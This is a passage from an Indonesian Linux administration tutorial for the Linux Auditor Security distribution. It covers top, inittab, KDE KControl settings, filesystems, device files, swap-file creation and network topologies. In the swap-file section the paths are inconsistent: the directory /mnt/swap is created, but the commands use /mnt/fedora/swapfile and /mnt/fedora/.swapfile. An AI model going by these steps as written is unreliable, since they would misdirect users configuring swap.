Copyright © 2007 hhan.wordpress.com Fungsi dari perintah top hampir sama dengan perintah ps, perbedaanya adalah perintah top meng-capture proses-proses pada system secara real time. Interval waktu peng-capture-an dapat ditentukan sesuai yang diinginkan. Kelemahan top dibandingkan dengan ps adalah, top lebih banyak memakan memory dibandingkan dengan ps. Adapun penggunakan perintahnya adalah seperti berikut : root@hhan:~# top top - 14:01:00 up 2:23, 1 user, load average: 0.03, 0.11, 0.06 Tasks: 59 total, 1 running, 58 sleeping, 0 stopped, 0 zombie Cpu(s): 1.4% us, 1.2% sy, 0.0% ni, 96.5% id, 1.0% wa, 0.0% hi, 0.0% si Mem: 255124k total, 210572k used, 44552k free, 42404k buffers Swap: 0k total, 0k used, 0k free, 92484k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 3283 root 5 -10 64272 13m 2136 S 1.2 5.3 0:49.63 XFree86 3985 root 15 0 49984 8616 5776 S 1.0 3.4 0:07.20 xmms 3408 hhan 15 0 27688 15m 12m S 0.2 6.2 0:12.73 kdeinit 1 root 16 0 156 76 52 S 0.0 0.0 0:01.36 init 2 root 34 19 0 0 0 S 0.0 0.0 0:00.01 ksoftirqd/0 3 root 10 -5 0 0 0 S 0.0 0.0 0:00.06 events/0 4 root 10 -5 0 0 0 S 0.0 0.0 0:00.00 khelper
69
Copyright © 2007 hhan.wordpress.com Untuk mengubah interval waktu, tekan “d” kemudian tuliskan interval yang diinginkan dalam detik. Untuk memunculkan bantuan tekan “h” kemudian akan muncul seperti di bawah : Help for Interactive Commands - procps version 3.2.4 Window 1:Def: Cumulative mode Off. System: Delay 3.0 secs; Secure mode Off. Z,B Global: 'Z' change color mappings; 'B' disable/enable bold l,t,m Toggle Summaries: 'l' load avg; 't' task/cpu stats; 'm' mem info 1,I Toggle SMP view: '1' single/separate states; 'I' Irix/Solaris mode f,o . Fields/Columns: 'f' add or remove; 'o' change display order F or O . Select sort field <,> . Move sort field: '<' next col left; '>' next col right R . Toggle normal/reverse sort c,i,S . Toggle: 'c' cmd name/line; 'i' idle tasks; 'S' cumulative time x,y . Toggle highlights: 'x' sort field; 'y' running tasks z,b . Toggle: 'z' color/mono; 'b' bold/reverse (only if 'x' or 'y') u . Show specific user only n or # . Set maximum tasks displayed k,r renice d or s W q
Manipulate tasks: 'k' kill; 'r'
Set update interval Write configuration file Quit ( commands shown with '.' require a visible task display window )
70
Copyright © 2007 hhan.wordpress.com Untuk kembali ke tampilan awal tekan “q”, kemudian tekan “q” sekali lagi untuk keluar dari top. •
Init Proses
Init merupakan proses yang pertama kali akan dijalankan oleh system, setelah system menjalankan init maka init sendiri akan menjalankan proses-proses lain yang dijalankan pada saat booting. Init sendiri menjalankan prosesproses berdasarkan file konfigurasinya yang terdapat pada /etc/inittab. Berikut ini merupakan isi dari file /etc/inittab yang terdapat pada linux auditor security : # /etc/inittab: init(8) configuration. # $Id: inittab,v 1.9 2001/05/31 10:37:50 knopper Exp $ # The default runlevel. id:5:initdefault: # Boot-time system configuration/initialization script. # This is run first except when booting in emergency (-b) mode. si::sysinit:/etc/init.d/rcS # What to do in single-user mode. ~~:S:respawn:/bin/bash -login >/dev/tty1
2>&1
# /etc/init.d executes the S and K scripts upon change # of runlevel. # # Runlevel 0 is halt. # Runlevel 1 is single-user.
71
Copyright © 2007 hhan.wordpress.com # Runlevels 2-5 are multi-user. # Runlevel 6 is reboot. l0:0:wait:/etc/init.d/rc l1:1:wait:/etc/init.d/rc l2:2:wait:/etc/init.d/rc l3:3:wait:/etc/init.d/rc l4:4:wait:/etc/init.d/rc l5:5:wait:/etc/init.d/rc l6:6:wait:/etc/init.d/rc l6:6:wait:/etc/init.d/rc
0 1 2 3 4 5 6 6
# What to do when CTRL-ALT-DEL is pressed. ca::ctrlaltdel:/sbin/shutdown -r now # Action on special keypress (ALT-UpArrow). kb::kbrequest:/bin/echo "Keyboard Request edit /etc/inittab to let this work."
--
# What to do when the power fails/returns. pf::powerwait:/etc/init.d/powerfail start pn::powerfailnow:/etc/init.d/powerfail now po::powerokwait:/etc/init.d/powerfail stop # /sbin/getty invocations for the runlevels. # # The "id" field MUST be the same as the last # characters of the device (after "tty"). # # Format: # :::<process> 1:12345:respawn:/sbin/getty 38400 tty1 2:2345:respawn:/sbin/getty 38400 tty2 3:2345:respawn:/sbin/getty 38400 tty3 4:2345:respawn:/sbin/getty 38400 tty4 5:2345:respawn:/sbin/getty 38400 tty5 6:2345:respawn:/sbin/getty 38400 tty6 # Example how to put a getty on a serial line (for a terminal) #
72
Copyright © 2007 hhan.wordpress.com # #T0:23:respawn:/sbin/getty -L ttyS0 9600 vt100 #T1:23:respawn:/sbin/getty -L ttyS1 9600 vt100 # Example how to put a getty on a modem line. # #T3:23:respawn:/sbin/mgetty -x0 -s 57600 ttyS3 #-- isdnutils begin # Change the lines below for your local setup and uncomment them. # Use "init q" to reread inittab. # look at the vboxgetty / mgetty manpage for more information (mgetty isn't # standard!) # #I0:2345:respawn:/usr/sbin/vboxgetty -d /dev/ttyI0 #I1:2345:respawn:/sbin/mgetty -D -m '"" ATZ OK AT&Eyourmsnhere OK AT&B512 OK' -s 38400 ttyI1 #-- isdnutils end # Run X Window session from CDROM in runlevel 5 #w5:5:wait:/bin/sleep 2 #x5:5:wait:/etc/init.d/xsession start
5.4 Administrasi “KControl”
System
Menggunakan
Pada linux auditor seurity, administrasi system dapat dilakukan juga dengan menggunakan “KControl” yang memiliki tampilan GUI, KControl disini dapat kita pandang seperti sebuah control panel pada system operasi windows. Untuk menjalankan KControl anda dapat memulai dengan klik start menu Æ System Æ KComtrol , untuk lebih jelasnya ada dapat melihat gambar dibawah :
73
Copyright © 2007 hhan.wordpress.com
Gambar 5.1 Memulai KControl
5.4.1 Appearance & Themes Option appearance and themes digunakan untuk melakukan beberapa setting, diantaranya adalah setting background, colors, fonts, icons, launch feedback, screen saver, splash screen, style, theme manager, dan window decorations. Background Option background digunakan untuk melakukan setting background atau wallpaper. Background atau wallpaper dapat disetting sama untuk semua desktop atau berbeda untuk masing-masing desktop. Jika pilihan “setting for desktop : All desktop”, maka background atau wallpaper untuk
74
Copyright © 2007 hhan.wordpress.com semua desktop (desktop1, desktop2, desktop3,dst) akan sama. Terdapat tiga macam background : - no picture, yaitu jika diinginkan tanpa ada background. - picture, yaitu jika diinginkan 1 buah gambar sebagai background. untuk menampilkannya kllik tanda folder disbelah kanan kemudian tentukan direktori dimana gambar anda berada, kemudian klik ok, untuk lebih jelasnya anda bisa melihat pada gambar dibawah ini:
Gambar 5.2 Menentukan wallpaper - slide show, yaitu jika diingnkan wallpaper terdiri dari banyak gambar dan ditampilkan bergantian dalam interval waktu tertentu. Background sendiri memiliki tiga option, yaitu : positions, colors dan blending. Option-option ini digunakan untuk mengatur tampilan background anda, sehingga background dapat diatur sesusai selera anda.
Colors
75
Copyright © 2007 hhan.wordpress.com colors digunakan untuk menggatur warna tampilan dari window sehingga sesuai dengan selera anda. Pada options colors ini terdapat setting untuk warna, misalnya warna untuk active window, inactive window, link, button, text, dsb.
Gambar 5.3 option Colors Fonts Fonts digunakan untuk mengatur style dari font misalnya font pada toolbar, taskbar desktop, menu, window title, fixed width dan general. Font pada tiap-tiap pilihan dapat diganti dengan font lainya dengan meng-klik tombol choose pada sebelah kanan option.
76
Copyright © 2007 hhan.wordpress.com Icons Menu icons digunakan untuk mengganti model icon. Launch feedback Digunakan untuk seting kursor indikasi yaitu cursor pada saat sedang sibuk. Screen saver Screen saver digunakan untuk seting screen saver. Pada linux auditor security ini belum disediakan pilihan screen saver. Splash screen Splash screen yaitu tampilan awal sebelum masuk ke mode xwindow. Terdapat 5 macam splash screen yang disediakan linux auditor security: default, kanotix, reedmond, standart dan blu-bend. Untuk membuat tampilan splash screen anda terlihat mirip seperti splash screen pada windows anda dapat memilih redmond.
77
Copyright © 2007 hhan.wordpress.com
Gambar 5.4 Splash screen Style Style digunakan untuk mengatur tampilan menu pada window misalnya tampilan pada button, combo box, check box, dsb.
Gambar 5.5 Option Style
78
Copyright © 2007 hhan.wordpress.com 5.4.2 Desktop Option desktop digunakan untuk seting desktop, misalnya untuk seting taskbar, desktop icon, jumlah desktop, mouse event, ukuran taskbar, dsb. Behavior Terdapat beberapa pilihan setting pada behavior seperti: - show icon on desktop, digunakan untuk menampilkan icon pada desktop. Jika pilihan ini di disable maka tidak akan ada icon pada desktop anda, dengan kata lain icon-icon yang sudha ada pada desktop anda akan disembunyikan. - mouse button actions, digunakan untuk mengatur aksi apa yang terjaadi jika anda mengklik button mouse pada desktop (baik kllik kanan, tengah, ataupun klik kiri). Multiple desktop Digunakan untuk mengatur berapa banyak desktop yang diinginkan.
79
Copyright © 2007 hhan.wordpress.com
Gambar 5.6 Multiple desktop Panels Option panel digunakan untuk mengatur setting pada taskbar. Pada otions panel terdapat 4 tab: arrangement, hiding, menus dan appearance. tab arangement digunakan untuk mengatur : - posisi, posisi dari taskbar bisa diatur sesuai kenginan dan selera anda, bisa di kanan, kiri, atas ataupun bawah. - lenght, digunakan untuk mengatrur panjang dari taksbar - size, digunakan untuk mengatur besar kecilnya taksbar anda. Terdapat 5 pilihan ukuran taskbar yaitu: tiny, small, normal, large dan custom. Untuk custom anda bisa mengaturnya dengan menggeser control bar.
80
Copyright © 2007 hhan.wordpress.com Pada tab hidding terdapat option-option yang digunakan untuk mengatur muncul tidaknya sebuah taskbar. Anda dapat mengatur taskbar menghilang saat anda meng-kllik tombol hidding yaitu dengan memilih "only hide when a panelhiding button is clicked" atau menghilang setelah beberapa detik dengan memilih option "hide automatically". Tombol panel-hiding dapat diatur juga letaknya pada sisi kiri taskbar, kanan taskbar atau pada kedua sisi taskbar, dengan mengaatur setting pada option "panel-hidding button". Option "panel animation" digunakan untuk menentukan apakah saat tombol hiding-button di click taskbar akan menghilang secara perlahan-lahan atau tidak. jika "animate panel-hiding" dipilih maka ketika tombol panel-hiding di click taskbar akan menghilang secara perlahan-lahan Pada tab appearance anda dpt mengatur transparansi dari taskbar dengan memilih option "enable transparance", dan juga anda dapat mengatur background dari taskbar dengan memilih option "enble background image". 5.4.3 Peripherals Options peripherals digunakan untuk mengatur konfigurasi device-device yang terkoneksi pada komputer seperti display, joystick, keyboard dan mouse. Keyboard Option keyboard digunakan untuk setting keyboard seperti delay, rate , dan NumLock. NumLock digunakan untuk mengatur aktif tidaknya Tombol
81
Copyright © 2007 hhan.wordpress.com num pad. Num pad dapat diatur aktif atau tidak dengan memilih option pada "NumLock on KDE startup", pilih Turn on jika diinginkan num pad aktif ketika masuk ke xwindow.
Gambar 5.7 Options keyboard Mouse Options mouse digunakan untuk mengatur kinerja dari mouse. Pada tab general kita dapat mengatur button order, yaitu tombol mouse yang mana yang ingin digunakan untuk melakukan eksekusi. Jika dinginkan tombol kiri mouse yang dipakai untuk eksekusi maka pilih option "Righ handed", tetapi bila diingkan tombol kanan mouse yang ingin dipakai untuk melakukan eksekusi maka pilih option “Left handed".
82
Copyright © 2007 hhan.wordpress.com Options "reverse scroll direction" dipakai untuk membalikan arah pergerakan dari scroll mouse. Pada options mouse ini juga terdapat pilihan apakah eksekusi sebuah file dengan memakai double klik atau single klik, jika diinginkan eksekusi sebuah file menggunakan double klik maka pilih "Double click to open file and folder".
Gambar 5.8 Tab general pada options mouse Pada tab cursor theme anda dapat memilih beberapa model cursor, linux auditor security menyertakan 5 jenis model cursor yaitu: industrial, No Theme, handheld, redglass dan whiteglass, anda dapat memilih salah satu sesuai dengan selera anda.
83
Copyright © 2007 hhan.wordpress.com
Gambar 5.9 Tab cursor theme pada option mouse 5.4.4 System Administration Options System Administration digunakan untuk mengatur administrasi sistem seperti tanggal, waktu, login dan path. Date and Time Option “date & time” digunakan untuk mengatur tanggal, waktu dan time zone. Jika tanggal yang tertera tidak cocok dengan tanggal saat ini, anda dapat mengubahnya dengan meng-klik tanggal sesuai dengan tanggal saat ini kemudian klik apply. Untuk mencocokan jam anda dapat mengubahnya dengan mengganti angka pada kolom dibawah gambar jam sesuai dengan waktu saat ini.
84
Copyright © 2007 hhan.wordpress.com
Gambar 5.10 Option Date & Time Login manager Options login manager digunakan untuk mengatur user dan tampilan window “login box”. “Login box” adalah tampilan pertama kali ketika user diminta untuk memasukan password sebelum masuk ke xwindow. Pada tab appearance anda dapat mengganti tulisan yang tertera pada “login box” dengan mengubah text yang terdapat pada option "greeting" sesuai dengan kehendak anda. Options logo area digunakan untuk mengatur logo kecil yang ingin ditampilkan pada window “login box”.
85
Copyright © 2007 hhan.wordpress.com
Gambar 5.11 Tab appearance pada option Login manager Terdapat 3 pilihan logo area, yaitu: - None, jika diinginkan tanpa logo pada “login box”. - Show clock, jika dinginkan logo diganti dengan sebuah animasi jam analog. - Show logo, jika dinginkan logo berupa sebuah gambar. Jika pilihan ini diaktifkan, anda dapat menganti gambar logo dengan meng-klik tombol yang berada pada sebelah kanan option "Logo", kemudian pilih gambar yang ingin anda jadikan logo dan klik open.
86
Copyright © 2007 hhan.wordpress.com
Gambar 5.12 Memilih logo Option position digunakan untuk mengatur letak window “login box”, anda dapat mengubah posisinya dengan mengubah nilai yang ada pada text area sebelah kanan x dan y, x berarti koordinat x dan y berarti koordinat y. Font dari text yang ditampilkan pada tampilan login dapat diatur pada tab font, sedangkan background dapat diatur pada tab background. Tab shutdown digunakan untuk mengatur hak dari user untuk mematikan sistem. Terdapat 3 pilihan user yang berhak untuk mematikan system baik dari lokal maupun secara remote, yaitu: - Everybody, yang berarti semua user mempunyai hak untuk mematikan system. - Only root, yang berarti hanya root yang berhak mematikan system. - Nobody, yang berarti tidak ada 1 user-pun yang berhak mematikan system. Pada tab shutdown option "allow shutdown" dibedakan menjadi 2 pilihan, yaitu: lokal dan remote. Lokal berarti user login melalui sistem secara langsung (user mempunyai akses secara fisik ke komputer), remote berarti user melakukan login tidak melalui sistem secara langsung, dengan
87
Copyright © 2007 hhan.wordpress.com kata lain user tersebut berbeda IP dengan IP pada sistem lokal, hal ini memungkinkan jika user tersebut memakai program remote seperti SSH.
Gambar 5.13 Tab shutdown pada option Login Manager Tab user dipakai untuk mengatur user. Option "System UIDs" digunakan untuk mengatur range nilai dari user ID. Pada option "user images" kita dapat mengganti simbol tiap user dengan memilih user yang ingin kita ganti simbolnya pada drop down list disebelah kanan option "User", kemudian klik tombol yang berada dibawah drop down list, dan pilih gambar yang anda inginkan dan kemudian klik open.
88
Copyright © 2007 hhan.wordpress.com
Gambar 5.14 tab Users pada option Login Manager Tab Convenience diapakai untuk mengatur user auto login, yaitu user yang otomatis login tanpa diminta untuk memilih dan memasukan password ketika sistem dinyalakan. Option ini dapat diaktifkan dengan memberi tanda check pada option "Enable auto-login", kemudian pilih user yang diinginkan pada drop down list. Pilihan "enable pasword-less logins" digunakan untuk memilih user yang tidak dimintai untuk memasukan password, perlu diingat bahwa user pada option ini berbeda dengan user pada option "auto login".
89
Copyright © 2007 hhan.wordpress.com
Gambar 5.15 Tab Convenience pada option Login Manager Paths Option paths digunakan untuk mengatur direktori desktop, trash, autostart dan documents.
90
Copyright © 2007 hhan.wordpress.com
BAB 6 ORAGANISASI FILE PADA LINUX File system adalah metode dan struktur data yang digunakan untuk memelihara file-file pada sebuah disk atau partisi agar tetap berada pada tracknya. Linux mendukung beberapa filesystem, diantaranya adalah sebagai berikut : • minix filesystem lama, memiliki fitur yang sangat sedikit (kadang-kadang timestamp/pananda waktu hilang pada filename yang terdiri lebih dari 30 karakter ). • xia versi modifikasi dari filesystem minix yang memperbaiki keterbatasan pada filename dan ukuran filesystem dari minix, filesystem xia tidak memperkenalkan fitur baru. Filesystem xia sangat tidak popular, tetapi dilaporkan bekerja dengan sangat baik. • ext2 didesign untuk kompatibilitas pada filesystem berikutnya yang akan datang. • ext versi lama dari ext2. • msdos kompatibel dengan ms-dos (dan OS/2 dan Windows NT) FAT Filesystem. • usmdos pengembangan dari msdos filesystem pada linux untuk mendapatkan beberapa fitur seperti filename yang panjang, owners, permissions, links, dan file-file devices. • Iso9660 filesystem CD-ROM standar.
91
Copyright © 2007 hhan.wordpress.com •
• •
nfs network file system (file system jaringan) yang mengijinkan sharing filesystem diantara beberapa computer sehingga memudahkan ijin akses filesystem. hpfs OS/2 filesystem. sysv SystemV/386, Coherent, and Xenix filesystems.
Susunan direktori pada unix secara umum adalah seperti berikut ini :
Gambar 6.1 susunan direktori unix (Wirzenius, 1998: P.20) •
• •
Root filesystem spesifik untuk tiap-tiap mesin dan berisi file-file yang dibutuhkan untuk melakukan booting. Biasanya juga berisi tool untuk melakukan perbaikan pada system yang rusak, dan juga untuk recovery file backup yang hilang. /usr berisi commands/perintah-perintah konsole, libraries, dan manual. /var berisi file-file yang berubah setiap saat, seperti direktori spool (untuk mail, news,
92
Copyright © 2007 hhan.wordpress.com
• • • • • • • • • • •
printer, dsb), log files, formatted manual pages, temporary files. /home berisi file-file dari user yang bersangkutan. /bin bersisi command yang dapat dipakai selama bootup yang mungkin dibutuhkan oleh normal user. /sbin seperti /bin tetapi tidak untuk normal user, meskipun mungkin mereka diijinkan untuk menggunakanya. /etc berisi file-file konfigurasi. /root home direktori untuk user root. /lib shared libraries yang dibutuhkan oleh program pada root filesystem. /lib/modules loadable kernel modules. /dev file-file device. /tmp file-file temporary. /boot file-file yang dibutuhkan oleh loader seperti grub ataupun LILO. /mnt file-file yang digunakan untuk tujuan mounting oleh administrator system.
6.1
Tipe-Tipe File Pada System Operasi Linux
Terdapat beberapa tipe file dalam system operasi linux, diantaranya adalah sebagai berikut : • • •
File teks File yang tersusun dalam format standart ASCII. File teks perintah File yang tersusun dalam format sekumpulan perintah/script Directory
93
Copyright © 2007 hhan.wordpress.com
•
•
Sebuah direktori dapat berisi file-file dalam format apa saja. Tanda “/” menunjukan direktori root. Tanda “./” menunjukan direktorinya sendiri yang saat ini sedang aktif. Tanda “../” menunjukan pada parent directory (directory diatasnya) . Link Tipe link terbagi menjadi dua, yaitu hard link dan soft link (symbolic link). Hard link dapat dikatakan bukan merupakan tipe sebuah file tetapi merupakan nama lain dari sebuah file tertentu. Suatu file minimal memiliki satu link, yaitu nama file pertama kali filet tersebut dibuat. Sedangkan soft link (symbolic link) adalah sebuah link yang menghubungkan kepada suatu file dengan menunjuk kepada nama file tersebut. File tipe ini berisi pathname dari file yang ditunjuk. Device driver Device driver terbagi menjadi dua, yaitu : block device dan character device.
6.2
Block Device Dan Character Device
Sistem operasi Linux ataupun Unix sedikit berbeda dengan system opersi Windows dalam menangani sebuah device. Pada system operasi Linux ataupun Unix semua device dianggap sebagai sebuah file, sehingga drive-drive seperti floppy disk, harddisk, CDROM, dll. tidak tampak. File-file kusus yang merupakan symbol dari device-device tersebut tersimpan pada directory /dev, device-device tersebut dapat berupa block device ataupun character device.
94
Copyright © 2007 hhan.wordpress.com
Character device adalah serangkain karakter yang dibaca berurutan misalnya serangkaian karakter yang kita tekan dari keyboard atau serangkaian data byte yang dikirim berurutan melalui serial line. Sedangkan block device atau sering disebut random access device adalah alat yang dapat menyimpan data dan menawarkan akses keseluruh bagian secara acak. Hard disk dan disket merupakan contoh dari block device. Dengan menggunakan hard disk kita dapat mengakses data yang tersimpan secara acak sedangkan bila menggunakan serial line misalnya, kita hanya dapat mengakses data sesuai urutannya. Masing-masing device node memiliki major dan minor number device. Major number memberitahu kernel, device apa yang mewakili node tersebut. Misalnya major number 3 adalah IDE hard disk dan major number 8 adalah SCSI disk. Minor number mewakili nomor partisi, minor number 0 adalah keseluruhan hard disk yang pertama dan minor number 1 hingga 15 adalah partisi yang mungkin bisa dibuat di hard disk tersebut. Sebagai contoh misalnya terdapat 2 buah IDE hard disk maka hard disk pertama adalah /dev/hda dan hard disk kedua adalah /dev/hdb. Jika masing-masing hard disk tersebut memiliki 2 buah partisi maka kita memiliki /dev/hda1, /dev/hda2, /dev/hdb1 dan /dev/hdb2. root@hhan:~# ls -l --sort=none /dev/hd[ab]{?,??} brw-rw---- 1 root disk 3, 1 Jun 21 /dev/hda1
2005
95
Copyright © 2007 hhan.wordpress.com brw-rw---/dev/hda2 brw-rw---/dev/hda3 brw-rw---/dev/hda4 brw-rw---/dev/hda5 brw-rw---/dev/hda6 brw-rw---/dev/hda7 brw-rw---/dev/hda8 brw-rw---/dev/hda9 brw-rw---/dev/hdb1 brw-rw---/dev/hdb2 brw-rw---/dev/hdb3 brw-rw---/dev/hdb4 brw-rw---/dev/hdb5 brw-rw---/dev/hdb6 brw-rw---/dev/hdb7 brw-rw---/dev/hdb8 brw-rw---/dev/hdb9 brw-rw---/dev/hda10 brw-rw---/dev/hda11 brw-rw---/dev/hda12
1 root disk 3,
2 Jun 21
2005
1 root disk 3,
3 Jun 21
2005
1 root disk 3,
4 Jun 21
2005
1 root disk 3,
5 Jun 21
2005
1 root disk 3,
6 Jun 21
2005
1 root disk 3,
7 Jun 21
2005
1 root disk 3,
8 Jun 21
2005
1 root disk 3,
9 Jun 21
2005
1 root disk 3, 65 Jun 21
2005
1 root disk 3, 66 Jun 21
2005
1 root disk 3, 67 Jun 21
2005
1 root disk 3, 68 Jun 21
2005
1 root disk 3, 69 Jun 21
2005
1 root disk 3, 70 Jun 21
2005
1 root disk 3, 71 Jun 21
2005
1 root disk 3, 72 Jun 21
2005
1 root disk 3, 73 Jun 21
2005
1 root disk 3, 10 Jun 21
2005
1 root disk 3, 11 Jun 21
2005
1 root disk 3, 12 Jun 21
2005
96
Copyright © 2007 hhan.wordpress.com brw-rw---/dev/hda13 brw-rw---/dev/hda14 brw-rw---/dev/hda15 brw-rw---/dev/hda16 brw-rw---/dev/hda17 brw-rw---/dev/hda18 brw-rw---/dev/hda19 brw-rw---/dev/hda20 brw-rw---/dev/hda21 brw-rw---/dev/hdb11 brw-rw---/dev/hdb12 brw-rw---/dev/hdb13 brw-rw---/dev/hdb14 brw-rw---/dev/hdb15 brw-rw---/dev/hdb16 brw-rw---/dev/hdb17 brw-rw---/dev/hdb18 brw-rw---/dev/hdb19 brw-rw---/dev/hdb20
1 root disk 3, 13 Jun 21
2005
1 root disk 3, 14 Jun 21
2005
1 root disk 3, 15 Jun 21
2005
1 root disk 3, 16 Jun 21
2005
1 root disk 3, 17 Jun 21
2005
1 root disk 3, 18 Jun 21
2005
1 root disk 3, 19 Jun 21
2005
1 root disk 3, 20 Jun 21
2005
1 root disk 3, 21 Jun 21
2005
1 root disk 3, 75 Jun 21
2005
1 root disk 3, 76 Jun 21
2005
1 root disk 3, 77 Jun 21
2005
1 root disk 3, 78 Jun 21
2005
1 root disk 3, 79 Jun 21
2005
1 root disk 3, 80 Jun 21
2005
1 root disk 3, 81 Jun 21
2005
1 root disk 3, 82 Jun 21
2005
1 root disk 3, 83 Jun 21
2005
1 root disk 3, 84 Jun 21
2005
97
Copyright © 2007 hhan.wordpress.com Huruf b pada bagian awal tersebut merupakan sebuah tanda jika file tersebut termasuk file bertipe block device, sedangkan jika file tersebut merupakan sebuah file bertipe character device maka akan diberi tanda c pada bagian awalnya. 6.3 Membuat Swap File Untuk membuat suatu swap file, buatlah sebuah folder kosong pada directory linux anda yang nantinya akan digunakan untuk meletakan file swap. root@hhan:~# mkdir /mnt/swap/
Kemudian ketik perintah-perintah berikut ini: root@hhan:~# dd if=/dev/zero of=/mnt/fedora/swapfile bs=1024 count=65536
Ubah nilai count sesuai dengan ukuran swap yg anda inginkan (dalam KB). root@hhan:~# mkswap /mnt/fedora/.swapfile root@hhan:~# swapon /mnt/fedora/.swapfile
Jika berhasil maka akan terbentuk sebuah swap file pada directory /mnt/swap. Perintah swapon digunakan untuk mengaktifkan file swap tersebut. File swap tersebut akan tetap aktif sampai computer melakukan restart, setelah computer restart file swap tersebut tidak akan aktif kembali. Tambahkan baris berikut pada file /etc/fstab agar file swap tersebut secara otomatis diload saat pertama kali computer melakukan booting.
98
Copyright © 2007 hhan.wordpress.com /mnt/swap/.swapfile swap swap defaults 0 0
BAB 7 ADMINISTRASI JARINGAN 7.1
Memahami Jaringan Komputer
Jaringan komputer merupakan sekumpulan komputer yang saling berkomunkasi antara yang satu dengan yang lainya untuk saling berbagi informasi dan perlengkapan. Jaringan mempunyai fungsi untuk mengatur hubungan antara pengirim dan penerima sehingga antara pengirim dan penerima dapat saling berhubungan, selain itu jaringan juga menjamin agar informasi yang dikirimkan sampai di tempat tujuan dalam keadaan baik bebas dari kesalahan. Jaringan komputer terkoneksi oleh suatu media transmisi, baik berupa kabel ataupun tanpa kabel/wireless. Secara umum, jaringan memiliki beberapa komponen, antara lain : •
• •
Server Sebuah mesin/komputer yang menyediakan resource yang dapat diakses oleh pengguna lain dalam jaringan. Client Suatu mesin/komputer yang mengakses resource yang disediakan oleh server. Media
99
Copyright © 2007 hhan.wordpress.com
• •
Perlengkapan atau alat yang digunakan untuk menghubungkan antara komputer yang satu dengan komputer lainya dalam jaringan, yang fungsinya adalah digunakan sebagai media untuk mentransfer informasi. Shared data Data-data yang disediakan oleh server. Resource Device, file, printer, atau komponen-komponen lainya yang dapat digunakan oleh pengguna jaringan.
Dalam melihat kualitas pelayanan suatu system jaringan komputer dapat diukur berdasarkan beberapa hal, diantaranya adalah sebagai berikut: •
•
•
•
Reliability (kehandalan) Diukur dengan melihat tingkat kesalahan transmisi pada suatu saluran yang digunakan dan tingkat kerusakanya. Capacity (kapasitas) Diukur dengan melihat kapasitas jaringan yang ditentukan oleh kecepatan transmisi jaringan tersebut. Capability (kemampuan layanan) Diukur dengan melihat fungsi layanan yang dimiliki oleh system jaringan komputer dan tingkat kualitas layananya. Security (keamanan) Diukur dengan melihat seberapa baik keamanan system jaringan komputer tersebut dalam menangani masalah keamanan data saat transmisi, keabsahan data, authentikasi, serta hal-hal lainya.
100
Copyright © 2007 hhan.wordpress.com
7.2
Pembagian Jenis-Jenis Jaringan Komputer
Jaringan komputer dibedakan menjadi 2 kelompok, masing-masing kelompok dibagi lagi menjadi beberapa jenis. Keempat kelompok tersebut adalah : jaringan komputer berdasarkan topologi, dan jaringan komputer berdasarkan geografis jaringan. 7.2.1 Topologi Jaringan Komputer Berdasarkan topologinya jaringan komputer dibagi atas tiga macam, yaitu : topologi bus, topologi ring, dan topolgi star. Topologi sendiri adalah suatu pola yang menggambarkan bagaimana susunan antara komputer yang satu dengan komputer yang lainya, sehingga masing-masing komputer dalam satu jaringan dapat saling berkomunikasi. Masing-masing topologi jaringan komputer memiliki kelebihan dan kekurangan yang berbeda. 7.2.1.1
Topologi Bus
Topologi bus menghubungkan komputer-komputer dalam sebuah kabel yang kedua ujung dari kabel tersebut tidak bertemu dalam satu titik, pada kedua ujung kabel tersebut diberi sebuah alat yang disebut dengan terminator. Pada saat sinyal mencapai unjung kabel, terminator difungsikan untuk menahan energi listrik dan menghentikan
101
Copyright © 2007 hhan.wordpress.com pemantulan sinyal listrik yang bebas bergerak sepanjang kabel pada saat proses transmisi. Untuk lebih jelasnya , topology bus terlihat seperti pada gambar dibawah ini :
Gambar 7.0 Topology bus. Karakteristik dari topologi bus adalah seperti berikut ini: • Masing-masing komputer dihubungkan oleh sebuah kabel yang ujungnya diberi terminator. • Instalasi yang sederhana dan murah. • Signal melewati kabel dalam dua arah, sehingga memungkinkan untuk terjadinya collision/tabarakan. Topologi bus dimerupakan topologi dengan biaya pembangunan termurah diantara topologi yang lainya. Tetapi topologi ini memiliki kekurangan yaitu saat terjadi masalah pada salah satu node dan menyebabkan koneksi node tersebut terputus, maka koneksi pada semua node dalam jaringan tersebut akan ikut terputus juga.
102
Copyright © 2007 hhan.wordpress.com Disamping kelebihan dan kekurangan dari topologi bus yang telah disebutjan diatas, berikut ini adalah kelebihan dan kekurangan dari topologi bus yang lainya : Kelebihan • Mudah dalam implementasi • Murah • Mudah untuk dipahami Kekurangan • Jaringan menjadi lambat jika lalu lintas pada jaringan padat, hal ini terjadi karena jaringan tidak mengkoordinasi komunikasi antar satu node dengan node lain, sehingga waktu transimisi menjadi lama. • Administrator jaringan akan kesulitan dalam melacak suatu masalah seperti kerusakan kabel pada suatu node. 7.2.1.2
Topologi Star
Topologi star menghubungkan komputer yang satu dengan lainya melalui kabel yang masing-masing kabel terhubung ke suatu unit konsentrator yang biasanya berupa sebuah hub atau switch. Pada saat komputer mentransmisikan sinyal ke dalam jaringan, sinyal menuju konsentrator (hub/switch). Kemudian konsentrator melanjutkan sinyal secara simultan ke semua komponen yang terkoneksi ke dirinya. Topologi star memiliki beberapa karakteristik senagai berikut : • Mudah dikembangkan, setiap penambahan 1 node diperlukan penambahan satu link.
103
Copyright © 2007 hhan.wordpress.com • • •
Jika terjadi kerusakan pada satu node maka node yang lain tidak ikut terganggu. Biasanya digunakan kabel UTP. Setiap node berkomunkasi langsung dengan konsentrator.
Untuk lebih jelasnya, berikut ini adalah gambar dari sebuah topology star.
Gambar 7.1 Topology star. Adapun keuntungan dan kerugian menggunakan topology star adalah sebagai berikut : Keuntungan • Kerusakan pada salah satu node tidak mempengaruhi node lainya dalam jaringan. • Topology star memungkinkan beberapa jenis kabel dipakai di dalam jaringan yang sama dengan memanfaatkan hub atau switch yang dapat mengakomodasi berbagai jenis kabel. • Pendeteksian kesalahan lebih mudah.
104
Copyright © 2007 hhan.wordpress.com Kerugian • Kerusakan pada konsentrator akan menyebabkan kegagalan koneksi ataupun gangguan pada seluruh node dalam jaringan. • Lebih mahal dari topologi bus.
7.2.1.3
Topologi Ring
